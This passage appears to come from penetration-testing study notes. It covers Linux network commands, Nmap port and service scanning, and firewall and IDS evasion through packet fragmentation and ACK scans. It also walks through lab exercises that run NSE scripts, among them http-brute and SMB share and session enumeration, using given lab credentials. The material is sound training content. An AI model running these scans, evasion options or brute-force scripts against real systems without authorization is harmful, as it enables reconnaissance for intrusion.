prevents the command from resolving IP addresses to hostnames, displaying the IP addresses directly in the output. Use to specify the target. 95 | ``` 96 | 97 | ### 2.3. Hostname Command 98 | 99 | The `hostname` command in Linux is used to display or set the system's network name (hostname). It's primarily used to identify the machine on a network. 100 | 101 | ```shell 102 | hostname 103 | # Displays the current hostname of the system. 104 | 105 | hostname 106 | # Sets the system's hostname to . 107 | 108 | hostname -f 109 | # Displays the fully qualified domain name (FQDN) of the system. 110 | 111 | hostname -i 112 | # Displays the IP address(es) associated with the hostname. 113 | ``` 114 | 115 | ### 2.4. Traceroute Command 116 | 117 | The **`traceroute`** command is used in Linux to map the journey that a packet of information undertakes from its source to its destination. 118 | 119 | ```shell 120 | traceroute 121 | # The basic command to trace the route that packets take to reach the specified . 122 | 123 | traceroute -n 124 | # Traces the route to but displays IP addresses without resolving them to hostnames. 125 | 126 | traceroute -I 127 | # Uses ICMP Echo Requests (like ping) instead of the default UDP packets to trace the route. 128 | 129 | traceroute -p 130 | # Specifies the destination port for the probe packets. 131 | 132 | traceroute -m 133 | # Sets the maximum number of hops (TTL) to be used in the trace. 134 | ``` 135 | 136 | ### 2.5. SS Command 137 | 138 | The **`ss`** command is a utility in Linux used to display detailed information about network sockets, which include TCP, UDP, and other protocol connections. 139 | 140 | ```shell 141 | man ss 142 | # ss Manual. 143 | 144 | ss -t 145 | # Displays all active TCP connections. 146 | 147 | ss -u 148 | # Displays all active UDP connections. 149 | 150 | ss -l 151 | # Displays all listening sockets (TCP, UDP, etc.). 152 | 153 | ss -n 154 | # Displays all connections with numeric addresses and ports. 155 | 156 | ss -tuln 157 | # Displays listening TCP and UDP sockets with numeric addresses. 158 | 159 | ss -p 160 | # Displays the process using each socket. 161 | 162 | ss -tnl 163 | # Displays all listening TCP sockets with numeric addresses. 164 | ``` 165 | 166 |
167 | 168 | ## 3. NMAP 169 | 170 | **Nmap** is a powerful network scanning tool used for discovering hosts, identifying open ports, and detecting service versions and vulnerabilities on a network. 171 | - Nmap [website](https://nmap.org/) 172 | - Zenmap [link](https://nmap.org/zenmap/) 173 | - The **`nmap -h`** command is used to display the help menu for Nmap. This menu provides a quick overview of the available options and how to use them. 174 | - Optimize Nmap scans by using Timing and Performance commands listed in **`nmap -h`**. 175 | 176 | ### 3.1. Nmap - Ports and Hosts scanning 177 | 178 | ```shell 179 | nmap -sn 180 | # Check if the host is alive. 181 | 182 | nmap -Pn 183 | # By default, Nmap performs a host discovery step before scanning. If a host does not respond to these probes, Nmap might not scan it further, assuming the host is down. With -Pn, Nmap skips the host discovery step and treats all specified IP addresses or hosts as "up" and proceeds directly to the port scanning phase. This is useful in situations where hosts are behind firewalls or have ICMP echo requests blocked, which would otherwise prevent Nmap from detecting them as online. 184 | 185 | nmap -T4 -Pn -sV -O 186 | # Service + O.S. detection scan. Nmap timing refers to the speed and aggressiveness of the scan, balancing between stealth and speed, with options ranging from slow and stealthy (T0) to fast and aggressive (T5). 187 | 188 | nmap -Pn -sV -T4 -A -oN 189 | # Host discovery comprehensive scan + saving into txt.file. 190 | # -oN > normal format, output.txt file. 191 | # -oX > XML output format. 192 | # -oG > Grepable output format. 193 | # -oA > Output in all three formats (-oN, -oX, and -oG) simultaneously. 194 | 195 | nmap -p- 196 | # This option tells Nmap to scan all ports from 1 to 65,535. 197 | 198 | nmap -p 199 | # Scan specific ports. 200 | 201 | nmap -sS 202 | # "TCP SYN scan" or "Stealth scan," is a widely used for scanning and identifying open ports on a target system. 203 | # Response from target: SYN/ACK > If the port is open | RST > If the port is closed | No Response or ICMP Error > If the port is filtered. 204 | 205 | nmap -sT 206 | # Performs a full TCP three-way handshake. After that, Nmap sends a RST (reset) packet to tear down the connection and move on to the next port. The results are generally very reliable but it's less stealthy and slower. 207 | # SYN/ACK Received > the port is marked as open | RST Received > the port is marked as closed | No Response or ICMP Error > the port might be filtered (e.g. blocked by a firewall). 208 | 209 | # Example of a faster nmap command: 210 | nmap -T5 -sU --top-ports 100 -Pn -n 211 | # Check UDP ports only. This command uses the fastest timing template, scans only the top 100 ports, skips host discovery, and disables DNS resolution. 212 | # -sU tells nmap to perform a **UDP scan** instead of the default TCP scan. 213 | ``` 214 | 215 | ### 3.2. Nmap - Firewall Detection and IDS Evasion 216 | 217 | ```shell 218 | nmap -sA 219 | # This type of scan is primarily used to map out firewall rule sets and determine whether ports are filtered or unfiltered, rather than to identify open or closed ports. 220 | # Filtered Ports > ports where no response was received, likely due to a firewall. 221 | # Unfiltered Ports > Ports have responded with an RST packet, indicating that they are accessible but not necessarily open. 222 | # Sometimes bypass simple stateful firewalls, which might not filter ACK packets as strictly as SYN packets. 223 | 224 | nmap -sS -f 225 | # Is used to fragment packets, a technique designed to evade detection by firewalls, intrusion detection systems (IDS), and intrusion prevention systems (IPS). 226 | # Might be used to bypass basic or outdated firewalls that do not inspect fragmented traffic thoroughly. 227 | ``` 228 | 229 | ### 3.3. Nmap - Nmap Scripting Engine (NSE) 230 | 231 | The **Nmap Scripting Engine** ([NSE](https://nmap.org/book/man-nse.html)) extends Nmap by enabling automated tasks like vulnerability detection and service discovery through [Lua](https://en.wikipedia.org/wiki/Lua_(programming_language)) scripts. Scripts are categorized into groups such as **vuln** (vulnerability scanning), **auth** (authentication testing), and **discovery** (network exploration). NSE is commonly used in security assessments to efficiently identify vulnerabilities and gather detailed network information. 232 | 233 | ```shell 234 | ls /usr/share/nmap/scripts/ 235 | # List of available Nmap scripts. 236 | 237 | ls -al /usr/share/nmap/scripts | grep -e "http" 238 | # -al > all files, including hidden ones, and provides a detailed list. 239 | # | grep -e "http" > searches for the pattern "http" in the output and pecifies the pattern to search for, in this case, "http". 240 | 241 | nmap --script-help | "**" 242 | # To search for a script related to a specific task or service, you can use or to search by keyword. 243 | 244 | nmap --script 245 | # You can run all scripts in a category by specifying the category name. 246 | 247 | # Example: Some scripts require or accept additional arguments. You can pass these using the --script-args option. 248 | nmap --script http-brute --script-args http-brute.path=/admin 249 | # This runs the http-brute script and specifies the path to brute-force as /admin. 250 | 251 | nmap -sS -sV -sC -p- -T4 252 | # This command would perform a version detection scan and run the default scripts on the target IP providing detailed information about the services running on that host and potentially identifying vulnerabilities or misconfigurations. 253 | 254 | nmap --script-help default 255 | # You can see the list of default scripts. 256 | 257 | # To see available scripts in a category and get more details about what they do, you can use the following command: 258 | nmap --script-help 259 | nmap --script
260 | ``` 261 | 262 | ### 3.4. Common NMAP Script Categories 263 | 264 | - **auth**: Scripts related to authentication bypass, brute force, and credential checking. 265 | - **broadcast**: Scripts that discover hosts and services on the network using broadcast and other local network techniques. 266 | - **default**: Default scripts that are run with the `-sC` option. 267 | - **discovery**: Scripts for host and network discovery. 268 | - **dos**: Scripts to test for Denial of Service (DoS) vulnerabilities. 269 | - **exploit**: Scripts that attempt to exploit vulnerabilities. 270 | - **external**: Scripts that rely on external information sources. 271 | - **fuzzer**: Scripts that test services by sending unusual inputs. 272 | - **intrusive**: Scripts that might be considered intrusive or cause damage. 273 | - **malware**: Scripts for detecting malware on the target. 274 | - **safe**: Scripts that are generally safe and unlikely to cause harm. 275 | - **vuln**: Scripts that check for known vulnerabilities. 276 | 277 | 278 | ### 3.5. Windows Recon: Nmap Host Discovery 279 | 280 | Host discovery using Nmap (Network Mapper) is a crucial step in network scanning to identify which hosts are up and running on a network. In this lab, we will learn a standard method to discover hosts using Nmap. 281 | 282 | In this lab environment, you will be provided with GUI access to a Kali machine. 283 | 284 | **Objective**: Your task is to discover available live hosts and their open ports using Nmap and identify the running services and applications. 285 | 286 | ```shell 287 | ping -c 5 288 | # 100% packet loss 289 | # We can observe that the target is not responding to the ping requests, so this does not confirm if it’s alive or down. 290 | nmap -sN 291 | # Host seems down 292 | nmap -Pn --traceroute 293 | nmap -Pn -sS -O -sV 294 | # We can see multiple ports are open on the target machine. 295 | ``` 296 | 297 | ### 3.6. Scan the Server 1 298 | 299 | Learn how to use Nmap to scan and detect open ports and services on a target network. 300 | 301 | **Objective:** This lab covers the process of performing port scanning and service detection with Nmap. 302 | 303 | ```shell 304 | ping -c 5 305 | # Target is alive 306 | nmap -Pn -sV 307 | # All 1000 scanned ports are in ignored states 308 | nmap -p- -Pn 309 | # Extend the scanning to all 65,535 Ports 310 | nmap -p 6421,41288,55413 -sV -O -v 311 | ``` 312 | 313 | 314 | ### 3.7. SMB Nmap Scripts 315 | 316 | SMB ([Server Message Block](https://en.wikipedia.org/wiki/Server_Message_Block)) is a network file sharing protocol primarily used for providing shared access to files, printers, and serial ports within a network (LAN). It allows systems on a network to communicate and share resources, commonly used in Windows environments. SMB also facilitates inter-process communication over a network. 317 | 318 | Nmap [SMB scripts](https://nmap.org/nsedoc/scripts/). 319 | 320 | **Objective:** Your task is to fingerprint the service using the tools available on the Kali machine and run Nmap scripts to enumerate the Windows target machine's SMB service. 321 | 1. Identify SMB Protocol Dialects 322 | 2. Find SMB security level information 323 | 3. Enumerate active sessions, shares, Windows users, domains, services, etc. 324 | 325 | The following username and password may be used to access the service: 326 | - **Username**: administrator 327 | - **Password**: smbserver_771 328 | 329 | ```shell 330 | ping -c 1 331 | # Target is alive 332 | 333 | ls /usr/share/nmap/scripts/ | grep smb 334 | 335 | cat /usr/share/nmap/scripts/smb-enum-shares.nse 336 | # Code and documentation inside the script. 337 | 338 | nmap -p 445 --script smb-protocols 339 | # Nmap script to list the supported protocols and dialects of an SMB server. 340 | 341 | nmap -p 445 --script smb-enum-sessions 342 | # We discovered that user 'bob' is logged in, even without requiring credentials. 343 | 344 | nmap -p 445 --script smb-enum-sessions --script-args smbusername=, smbpassword= 345 | # In case guest login is not enabled we can always use valid credentials of the target machine to discover the same information. 346 | 347 | nmap -p 445 --script smb-enum-shares 348 | # Scanning all shares using valid credentials to check the permissions. 349 | # The IPC$ share is also known as a null session connection. By using this session, Windows lets anonymous users perform certain activities, such as enumerating the names of domain accounts and network shares. 350 | 351 | nmap -p 445 --script smb-enum-shares,smb-ls --script-args smbusername=, smbpassword= 352 | # Enumerating all the shared folders and drives then running the ls command (The ls command is used to list files or directories, similarly dir in windows) on all the shared folders. 353 | ``` 354 | --------------------------------------------------------------------------------